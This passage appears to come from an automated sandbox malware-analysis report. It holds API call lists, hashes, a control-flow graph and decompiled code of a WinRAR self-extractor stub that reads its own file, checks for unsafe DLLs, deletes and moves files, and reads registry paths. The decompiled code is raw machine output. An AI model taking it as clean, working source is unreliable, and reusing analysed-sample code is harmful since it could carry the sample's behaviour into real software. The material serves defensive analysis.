                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBD7D
                                                    • SetDlgItemTextW.USER32(?,00000065,00CF35F4), ref: 00CDBD94
                                                    • GetDlgItem.USER32(?,00000065), ref: 00CDBD9D
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDBDAC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CDBDBB
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBE68
                                                    • _wcslen.LIBCMT ref: 00CDBEBE
                                                    • _swprintf.LIBCMT ref: 00CDBEE8
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDBF32
                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CDBF4C
                                                    • GetDlgItem.USER32(?,00000068), ref: 00CDBF55
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CDBF6B
                                                    • GetDlgItem.USER32(?,00000066), ref: 00CDBF85
                                                    • SetWindowTextW.USER32(00000000,00D0A472), ref: 00CDBFA7
                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CDC007
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC01A
                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CDC0BD
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00CDC197
                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CDC1D9
                                                      • Part of subcall function 00CDC73F: __EH_prolog.LIBCMT ref: 00CDC744
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                    • API String ID: 581453772-311033401
                                                    • Opcode ID: 22321d13e834dd6ac3be0aff27d4d179e10d990a075cb19fffe87c9ecb25695d
                                                    • Instruction ID: b02bda95bf7c78da842c67a684774b6dcab831cf87a6c31d76e57226e2214bea
                                                    • Opcode Fuzzy Hash: 22321d13e834dd6ac3be0aff27d4d179e10d990a075cb19fffe87c9ecb25695d
                                                    • Instruction Fuzzy Hash: DE42F470944349BAEB21AB60DC8AFBE776CAB11700F00405AF758E63D2CB749E45EB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 cd0863-cd0886 call cdec50 GetModuleHandleW 271 cd0888-cd089f GetProcAddress 268->271 272 cd08e7-cd0b48 268->272 273 cd08b9-cd08c9 GetProcAddress 271->273 274 cd08a1-cd08b7 271->274 275 cd0b4e-cd0b59 call ce75fb 272->275 276 cd0c14-cd0c40 GetModuleFileNameW call ccc29a call cd0602 272->276 277 cd08cb-cd08e0 273->277 278 cd08e5 273->278 274->273 275->276 286 cd0b5f-cd0b8d GetModuleFileNameW CreateFileW 275->286 292 cd0c42-cd0c4e call ccb146 276->292 277->278 278->272 287 cd0b8f-cd0b9b SetFilePointer 286->287 288 cd0c08-cd0c0f CloseHandle 286->288 287->288 290 cd0b9d-cd0bb9 ReadFile 287->290 288->276 290->288 294 cd0bbb-cd0be0 290->294 297 cd0c7d-cd0ca4 call ccc310 GetFileAttributesW 292->297 298 cd0c50-cd0c5b call cd081b 292->298 296 cd0bfd-cd0c06 call cd0371 294->296 296->288 305 cd0be2-cd0bfc call cd081b 296->305 308 cd0cae 297->308 309 cd0ca6-cd0caa 297->309 298->297 307 cd0c5d-cd0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cd0cb0-cd0cb5 308->312 309->292 311 cd0cac 309->311 311->312 313 cd0cec-cd0cee 312->313 314 cd0cb7 312->314 315 cd0dfb-cd0e05 313->315 316 cd0cf4-cd0d0b call ccc2e4 call ccb146 313->316 317 cd0cb9-cd0ce0 call ccc310 GetFileAttributesW 314->317 327 cd0d0d-cd0d6e call cd081b * 2 call cce617 call cc4092 call cce617 call cda7e4 316->327 328 cd0d73-cd0da6 call cc4092 AllocConsole 316->328 322 cd0cea 317->322 323 cd0ce2-cd0ce6 317->323 322->313 323->317 325 cd0ce8 323->325 325->313 334 cd0df3-cd0df5 ExitProcess 327->334 333 cd0da8-cd0ded GetCurrentProcessId AttachConsole call ce3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                    C-Code - Quality: 72%
                                                    			E00CD0863(void* __edx, char _a3, long _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
                                                    				char _v1;
                                                    				long _v4;
                                                    				char* _t111;
                                                    				int _t122;
                                                    				long _t133;
                                                    				void* _t149;
                                                    				_Unknown_base(*)()* _t168;
                                                    				struct _OVERLAPPED* _t174;
                                                    				struct _OVERLAPPED* _t175;
                                                    				signed char _t176;
                                                    				_Unknown_base(*)()* _t177;
                                                    				struct _OVERLAPPED* _t189;
                                                    				long _t190;
                                                    				void* _t191;
                                                    				_Unknown_base(*)()* _t192;
                                                    				struct HINSTANCE__* _t193;
                                                    				signed int _t195;
                                                    				struct _OVERLAPPED* _t196;
                                                    				signed int _t197;
                                                    				void* _t198;
                                                    				_Unknown_base(*)()* _t199;
                                                    				signed int _t200;
                                                    				int _t201;
                                                    				void* _t202;
                                                    
                                                    				E00CDEC50(0xb3cc);
                                                    				_t174 = 0;
                                                    				_a3 = 0;
                                                    				_t193 = GetModuleHandleW(L"kernel32");
                                                    				if(_t193 != 0) {
                                                    					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
                                                    					_t176 = _a46032;
                                                    					_t192 = _t168;
                                                    					if(_t192 != 0) {
                                                    						asm("sbb ecx, ecx");
                                                    						_t177 = _t192;
                                                    						 *0xcf3278( ~(_t176 & 0x000000ff) & 0x00cf35f4);
                                                    						 *_t192();
                                                    					}
                                                    					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
                                                    					if(_t199 != 0) {
                                                    						_t177 = _t199;
                                                    						 *0xcf3278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
                                                    						 *_t199();
                                                    						_v1 = 1;
                                                    					}
                                                    					_t174 = 0;
                                                    				}
                                                    				_t111 =  *0xcfe1a4; // 0xcf3c2c
                                                    				_t201 = _t200 | 0xffffffff;
                                                    				_a8 = L"version.dll";
                                                    				_t194 = 0x800;
                                                    				_a12 = L"DXGIDebug.dll";
                                                    				_a16 = L"sfc_os.dll";
                                                    				_a20 = L"SSPICLI.DLL";
                                                    				_a24 = L"rsaenh.dll";
                                                    				_a28 = L"UXTheme.dll";
                                                    				_a32 = L"dwmapi.dll";
                                                    				_a36 = L"cryptbase.dll";
                                                    				_a40 = L"lpk.dll";
                                                    				_a44 = L"usp10.dll";
                                                    				_a48 = L"clbcatq.dll";
                                                    				_a52 = L"comres.dll";
                                                    				_a56 = L"ws2_32.dll";
                                                    				_a60 = L"ws2help.dll";
                                                    				_a64 = L"psapi.dll";
                                                    				_a68 = L"ieframe.dll";
                                                    				_a72 = L"ntshrui.dll";
                                                    				_a76 = L"atl.dll";
                                                    				_a80 = L"setupapi.dll";
                                                    				_a84 = L"apphelp.dll";
                                                    				_a88 = L"userenv.dll";
                                                    				_a92 = L"netapi32.dll";
                                                    				_a96 = L"shdocvw.dll";
                                                    				_a100 = L"crypt32.dll";
                                                    				_a104 = L"msasn1.dll";
                                                    				_a108 = L"cryptui.dll";
                                                    				_a112 = L"wintrust.dll";
                                                    				_a116 = L"shell32.dll";
                                                    				_a120 = L"secur32.dll";
                                                    				_a124 = L"cabinet.dll";
                                                    				_a128 = L"oleaccrc.dll";
                                                    				_a132 = L"ntmarta.dll";
                                                    				_a136 = L"profapi.dll";
                                                    				_a140 = L"WindowsCodecs.dll";
                                                    				_a144 = L"srvcli.dll";
                                                    				_a148 = L"cscapi.dll";
                                                    				_a152 = L"slc.dll";
                                                    				_a156 = L"imageres.dll";
                                                    				_a160 = L"dnsapi.DLL";
                                                    				_a164 = L"iphlpapi.DLL";
                                                    				_a168 = L"WINNSI.DLL";
                                                    				_a172 = L"netutils.dll";
                                                    				_a176 = L"mpr.dll";
                                                    				_a180 = L"devrtl.dll";
                                                    				_a184 = L"propsys.dll";
                                                    				_a188 = L"mlang.dll";
                                                    				_a192 = L"samcli.dll";
                                                    				_a196 = L"samlib.dll";
                                                    				_a200 = L"wkscli.dll";
                                                    				_a204 = L"dfscli.dll";
                                                    				_a208 = L"browcli.dll";
                                                    				_a212 = L"rasadhlp.dll";
                                                    				_a216 = L"dhcpcsvc6.dll";
                                                    				_a220 = L"dhcpcsvc.dll";
                                                    				_a224 = L"XmlLite.dll";
                                                    				_a228 = L"linkinfo.dll";
                                                    				_a232 = L"cryptsp.dll";
                                                    				_a236 = L"RpcRtRemote.dll";
                                                    				_a240 = L"aclui.dll";
                                                    				_a244 = L"dsrole.dll";
                                                    				_a248 = L"peerdist.dll";
                                                    				if( *_t111 == 0x78) {
                                                    					L15:
                                                    					GetModuleFileNameW(_t174,  &_a772, _t194);
                                                    					E00CD0602( &_a9160, E00CCC29A(_t215,  &_a772), _t194);
                                                    					_t189 = _t174;
                                                    					do {
                                                    						_t195 = _t174;
                                                    						if(E00CCB146() < 0x600) {
                                                    							L19:
                                                    							_t196 =  *(_t202 + 0x18 + _t195 * 4);
                                                    							_push(0x800);
                                                    							E00CCC310(_t218,  &_a772, _t196);
                                                    							_t122 = GetFileAttributesW( &_a760); // executed
                                                    							if(_t122 != _t201) {
                                                    								_t189 = _t196;
                                                    								L23:
                                                    								if(_v1 != 0) {
                                                    									L29:
                                                    									_t225 = _t189;
                                                    									if(_t189 == 0) {
                                                    										return _t122;
                                                    									}
                                                    									E00CCC2E4(_t225,  &_a768);
                                                    									if(E00CCB146() < 0x600) {
                                                    										_push( &_a9160);
                                                    										_push( &_a768);
                                                    										E00CC4092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
                                                    										_t202 = _t202 + 0x18;
                                                    										_t122 = AllocConsole();
                                                    										__eflags = _t122;
                                                    										if(_t122 != 0) {
                                                    											__imp__AttachConsole(GetCurrentProcessId());
                                                    											_t133 = E00CE3E13( &_a4860);
                                                    											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
                                                    											Sleep(0x2710);
                                                    											_t122 = FreeConsole();
                                                    										}
                                                    									} else {
                                                    										E00CD081B(L"dwmapi.dll");
                                                    										E00CD081B(L"uxtheme.dll");
                                                    										_push( &_a9152);
                                                    										_push( &_a760);
                                                    										E00CC4092( &_a4852, 0x864, E00CCE617(0xf1), _t189);
                                                    										_t202 = _t202 + 0x18;
                                                    										_t122 = E00CDA7E4(0,  &_a4848, E00CCE617(0xf0), 0x30);
                                                    									}
                                                    									ExitProcess(0);
                                                    								}
                                                    								_t197 = 0;
                                                    								while(1) {
                                                    									_t175 =  *(_t202 + 0x38 + _t197 * 4);
                                                    									_push(0x800);
                                                    									E00CCC310(0,  &_a768, _t175);
                                                    									_t122 = GetFileAttributesW( &_a756);
                                                    									if(_t122 != _t201) {
                                                    										break;
                                                    									}
                                                    									_t197 = _t197 + 1;
                                                    									if(_t197 < 0x35) {
                                                    										continue;
                                                    									}
                                                    									goto L29;
                                                    								}
                                                    								_t189 = _t175;
                                                    								goto L29;
                                                    							}
                                                    							goto L20;
                                                    						}
                                                    						_t149 = E00CD081B( *(_t202 + 0x18 + _t195 * 4)); // executed
                                                    						if(_t149 == 0) {
                                                    							goto L19;
                                                    						}
                                                    						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
                                                    						_t218 = _t122 - 2;
                                                    						if(_t122 != 2) {
                                                    							goto L20;
                                                    						}
                                                    						goto L19;
                                                    						L20:
                                                    						_t174 =  &(_t174->Internal);
                                                    					} while (_t174 < 8);
                                                    					goto L23;
                                                    				} else {
                                                    					_t190 = E00CE75FB(_t177, _t111);
                                                    					if(_t190 == 0) {
                                                    						goto L15;
                                                    					}
                                                    					GetModuleFileNameW(_t174,  &_a4868, 0x800);
                                                    					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
                                                    					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190 || ReadFile(_t198,  &_a13260, 0x7ffe,  &_a4, _t174) == 0) {
                                                    						L14:
                                                    						CloseHandle(_t198);
                                                    						_t194 = 0x800;
                                                    						goto L15;
                                                    					} else {
                                                    						_push(0x104);
                                                    						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
                                                    						_push( &_a252);
                                                    						_push( &_a13260);
                                                    						while(1) {
                                                    							_t191 = E00CD0371();
                                                    							_t215 = _t191;
                                                    							if(_t191 == 0) {
                                                    								goto L14;
                                                    							}
                                                    							E00CD081B( &_a252);
                                                    							_push(0x104);
                                                    							_push( &_a248);
                                                    							_push(_t191);
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0B69
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD0B83
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD0B93
                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00CF3C7C,00000000), ref: 00CD0BB1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CD0C09
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0C1E
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CF3C7C,?,00000000,?,00000800), ref: 00CD0C72
                                                    • GetFileAttributesW.KERNELBASE(?,?,00CF3C7C,00000800,?,00000000,?,00000800), ref: 00CD0C9C
                                                    • GetFileAttributesW.KERNEL32(?,?,00CF3D44,00000800), ref: 00CD0CD8
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • _swprintf.LIBCMT ref: 00CD0D4A
                                                    • _swprintf.LIBCMT ref: 00CD0D96
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • AllocConsole.KERNEL32 ref: 00CD0D9E
                                                    • GetCurrentProcessId.KERNEL32 ref: 00CD0DA8
                                                    • AttachConsole.KERNEL32(00000000), ref: 00CD0DAF
                                                    • _wcslen.LIBCMT ref: 00CD0DC4
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CD0DD5
                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00CD0DDC
                                                    • Sleep.KERNEL32(00002710), ref: 00CD0DE7
                                                    • FreeConsole.KERNEL32 ref: 00CD0DED
                                                    • ExitProcess.KERNEL32 ref: 00CD0DF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                    • API String ID: 1207345701-3298887752
                                                    • Opcode ID: 5198745560befb8d3bd8a3ba3f2fc43649cdd94e9e65e698d67d808b4147560c
                                                    • Instruction ID: 88fac597f94b39c890bacd6e7a90e1782c3308493ea4fed0ef081fe67e66b801
                                                    • Opcode Fuzzy Hash: 5198745560befb8d3bd8a3ba3f2fc43649cdd94e9e65e698d67d808b4147560c
                                                    • Instruction Fuzzy Hash: 09D152F14183C8BBDB659F54C849BAFBBE8AF85704F50491EF38596250CBB08649CB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 58%
                                                    			E00CDC73F(void* __edx, void* __edi) {
                                                    				intOrPtr _t232;
                                                    				void* _t237;
                                                    				intOrPtr _t293;
                                                    				intOrPtr _t297;
                                                    				long _t308;
                                                    				void* _t311;
                                                    				signed int _t312;
                                                    				void* _t316;
                                                    
                                                    				E00CDEB78(0xcf2b20, _t316);
                                                    				_t232 = E00CDEC50(0x1b888);
                                                    				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
                                                    					L180:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
                                                    					return _t232;
                                                    				}
                                                    				_push(0x1000);
                                                    				_push(_t316 - 0x15);
                                                    				_push(_t316 - 0xd);
                                                    				_push(_t316 - 0x588c);
                                                    				_push(_t316 - 0xf894);
                                                    				_push( *((intOrPtr*)(_t316 + 0xc)));
                                                    				_t232 = E00CDB314(__edi, _t316);
                                                    				_t297 = _t232;
                                                    				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
                                                    				if(_t297 != 0) {
                                                    					_t293 =  *((intOrPtr*)(_t316 + 0x10));
                                                    					_push(__edi);
                                                    					do {
                                                    						_t237 = _t316 - 0x588c;
                                                    						_t311 = _t316 - 0x1b894;
                                                    						_t308 = 6;
                                                    						goto L4;
                                                    						L6:
                                                    						while(E00CD1FBB(_t316 - 0xf894,  *((intOrPtr*)(0xcfe744 + _t312 * 4))) != 0) {
                                                    							_t312 = _t312 + 1;
                                                    							if(_t312 < 0xe) {
                                                    								continue;
                                                    							} else {
                                                    								goto L178;
                                                    							}
                                                    						}
                                                    						if(_t312 > 0xd) {
                                                    							goto L178;
                                                    						}
                                                    						switch( *((intOrPtr*)(_t312 * 4 +  &M00CDD41B))) {
                                                    							case 0:
                                                    								__eflags = _t293 - 2;
                                                    								if(_t293 == 2) {
                                                    									_t308 = 0x800;
                                                    									E00CDA64D(_t316 - 0x788c, 0x800);
                                                    									E00CCA544(E00CCBDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
                                                    									 *(_t316 - 4) = 0;
                                                    									E00CCA67E(_t316 - 0x8894, _t316 - 0xd894);
                                                    									E00CC6EDB(_t316 - 0x388c);
                                                    									while(1) {
                                                    										_push(0);
                                                    										_t255 = E00CCA5D1(_t316 - 0x8894, _t316 - 0x388c);
                                                    										__eflags = _t255;
                                                    										if(_t255 == 0) {
                                                    											break;
                                                    										}
                                                    										SetFileAttributesW(_t316 - 0x388c, 0);
                                                    										__eflags =  *(_t316 - 0x2880);
                                                    										if(__eflags == 0) {
                                                    											L18:
                                                    											_t259 = GetFileAttributesW(_t316 - 0x388c);
                                                    											__eflags = _t259 - 0xffffffff;
                                                    											if(_t259 == 0xffffffff) {
                                                    												continue;
                                                    											}
                                                    											_t261 = DeleteFileW(_t316 - 0x388c);
                                                    											__eflags = _t261;
                                                    											if(_t261 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												_t314 = 0;
                                                    												_push(0);
                                                    												goto L22;
                                                    												L22:
                                                    												E00CC4092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
                                                    												_t318 = _t318 + 0x14;
                                                    												_t266 = GetFileAttributesW(_t316 - 0x1044);
                                                    												__eflags = _t266 - 0xffffffff;
                                                    												if(_t266 != 0xffffffff) {
                                                    													_t314 = _t314 + 1;
                                                    													__eflags = _t314;
                                                    													_push(_t314);
                                                    													goto L22;
                                                    												} else {
                                                    													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
                                                    													__eflags = _t269;
                                                    													if(_t269 != 0) {
                                                    														MoveFileExW(_t316 - 0x1044, 0, 4);
                                                    													}
                                                    													continue;
                                                    												}
                                                    											}
                                                    										}
                                                    										E00CCB991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
                                                    										E00CCB690(__eflags, _t316 - 0x1044, _t308);
                                                    										_t315 = E00CE3E13(_t316 - 0x788c);
                                                    										__eflags = _t315 - 4;
                                                    										if(_t315 < 4) {
                                                    											L16:
                                                    											_t280 = E00CCBDB4(_t316 - 0x588c);
                                                    											__eflags = _t280;
                                                    											if(_t280 != 0) {
                                                    												break;
                                                    											}
                                                    											L17:
                                                    											_t283 = E00CE3E13(_t316 - 0x388c);
                                                    											__eflags = 0;
                                                    											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
                                                    											E00CDFFF0(_t308, _t316 - 0x44, 0, 0x1e);
                                                    											_t318 = _t318 + 0x10;
                                                    											 *((intOrPtr*)(_t316 - 0x40)) = 3;
                                                    											_push(0x14);
                                                    											_pop(_t286);
                                                    											 *((short*)(_t316 - 0x34)) = _t286;
                                                    											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
                                                    											_push(_t316 - 0x44);
                                                    											 *0xd2307c();
                                                    											goto L18;
                                                    										}
                                                    										_t291 = E00CE3E13(_t316 - 0x1044);
                                                    										__eflags = _t315 - _t291;
                                                    										if(_t315 > _t291) {
                                                    											goto L17;
                                                    										}
                                                    										goto L16;
                                                    									}
                                                    									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
                                                    									E00CCA55A(_t316 - 0x8894);
                                                    								}
                                                    								goto L178;
                                                    							case 1:
                                                    								__eflags = __ebx;
                                                    								if(__ebx == 0) {
                                                    									__eax = E00CE3E13(__esi);
                                                    									__eax = __eax + __edi;
                                                    									_push(__eax);
                                                    									_push( *0xd1fc94);
                                                    									__eax = E00CE3E3E(__ecx, __edx);
                                                    									__esp = __esp + 0xc;
                                                    									__eflags = __eax;
                                                    									if(__eax != 0) {
                                                    										__eax = E00CE7686(__eax, __esi);
                                                    										_pop(__ecx);
                                                    										_pop(__ecx);
                                                    									}
                                                    									__eflags = __bh;
                                                    									if(__bh == 0) {
                                                    										__eax = L00CE3E2E(__esi);
                                                    									}
                                                    								}
                                                    								goto L178;
                                                    							case 2:
                                                    								__eflags = __ebx;
                                                    								if(__ebx == 0) {
                                                    									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                                                    								}
                                                    								goto L178;
                                                    							case 3:
                                                    								__eflags = __ebx;
                                                    								if(__ebx != 0) {
                                                    									goto L178;
                                                    								}
                                                    								__eflags =  *0xd0a472 - __di;
                                                    								if( *0xd0a472 != __di) {
                                                    									goto L178;
                                                    								}
                                                    								__eax = 0;
                                                    								__edi = __ebp - 0x588c;
                                                    								_push(0x22);
                                                    								 *(__ebp - 0x1044) = __ax;
                                                    								_pop(__eax);
                                                    								__eflags =  *(__ebp - 0x588c) - __ax;
                                                    								if( *(__ebp - 0x588c) == __ax) {
                                                    									__edi = __ebp - 0x588a;
                                                    								}
                                                    								__eax = E00CE3E13(__edi);
                                                    								__esi = 0x800;
                                                    								__eflags = __eax - 0x800;
                                                    								if(__eax >= 0x800) {
                                                    									goto L178;
                                                    								} else {
                                                    									__eax =  *__edi & 0x0000ffff;
                                                    									_push(0x5c);
                                                    									_pop(__ecx);
                                                    									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                                                    									if(( *__edi & 0x0000ffff) != 0x2e) {
                                                    										__eflags = __ax - __cx;
                                                    										if(__ax == __cx) {
                                                    											L64:
                                                    											__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, __esi);
                                                    											__ebx = 0;
                                                    											__eflags = 0;
                                                    											L65:
                                                    											_push(0x22);
                                                    											_pop(__eax);
                                                    											__eax = __ebp - 0x1044;
                                                    											__eax = E00CE279B(__ebp - 0x1044, __ebp - 0x1044);
                                                    											_pop(__ecx);
                                                    											_pop(__ecx);
                                                    											__eflags = __eax;
                                                    											if(__eax != 0) {
                                                    												__eflags =  *(__eax + 2) - __bx;
                                                    												if( *(__eax + 2) == __bx) {
                                                    													__ecx = 0;
                                                    													__eflags = 0;
                                                    													 *__eax = __cx;
                                                    												}
                                                    											}
                                                    											__eax = __ebp - 0x1044;
                                                    											__edi = 0xd0a472;
                                                    											E00CD0602(0xd0a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                                                    											__eax = E00CDB1BE(__ebp - 0x1044, __esi);
                                                    											__esi = GetDlgItem( *(__ebp + 8), 0x66);
                                                    											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                                                    											__eax = SendMessageW(__esi, 0x143, __ebx, 0xd0a472); // executed
                                                    											__eax = __ebp - 0x1044;
                                                    											__eax = E00CE3E49(__ebp - 0x1044, 0xd0a472, __eax);
                                                    											_pop(__ecx);
                                                    											_pop(__ecx);
                                                    											__eflags = __eax;
                                                    											if(__eax != 0) {
                                                    												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                                                    											}
                                                    											goto L178;
                                                    										}
                                                    										L53:
                                                    										__eflags = __ax;
                                                    										if(__ax == 0) {
                                                    											L55:
                                                    											__eax = __ebp - 0x1c;
                                                    											__ebx = 0;
                                                    											_push(__ebp - 0x1c);
                                                    											_push(1);
                                                    											_push(0);
                                                    											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                                                    											_push(0x80000002);
                                                    											__eax =  *0xd23028();
                                                    											__eflags = __eax;
                                                    											if(__eax == 0) {
                                                    												__eax = __ebp - 0x14;
                                                    												 *(__ebp - 0x14) = 0x1000;
                                                    												_push(__ebp - 0x14);
                                                    												__eax = __ebp - 0x1044;
                                                    												_push(__ebp - 0x1044);
                                                    												__eax = __ebp - 0x24;
                                                    												_push(__ebp - 0x24);
                                                    												_push(0);
                                                    												_push(L"ProgramFilesDir");
                                                    												_push( *(__ebp - 0x1c));
                                                    												__eax =  *0xd23024();
                                                    												_push( *(__ebp - 0x1c));
                                                    												 *0xd23008() =  *(__ebp - 0x14);
                                                    												__ecx = 0x7ff;
                                                    												__eax =  *(__ebp - 0x14) >> 1;
                                                    												__eflags = __eax - 0x7ff;
                                                    												if(__eax >= 0x7ff) {
                                                    													__eax = 0x7ff;
                                                    												}
                                                    												__ecx = 0;
                                                    												__eflags = 0;
                                                    												 *(__ebp + __eax * 2 - 0x1044) = __cx;
                                                    											}
                                                    											__eflags =  *(__ebp - 0x1044) - __bx;
                                                    											if( *(__ebp - 0x1044) != __bx) {
                                                    												__eax = __ebp - 0x1044;
                                                    												__eax = E00CE3E13(__ebp - 0x1044);
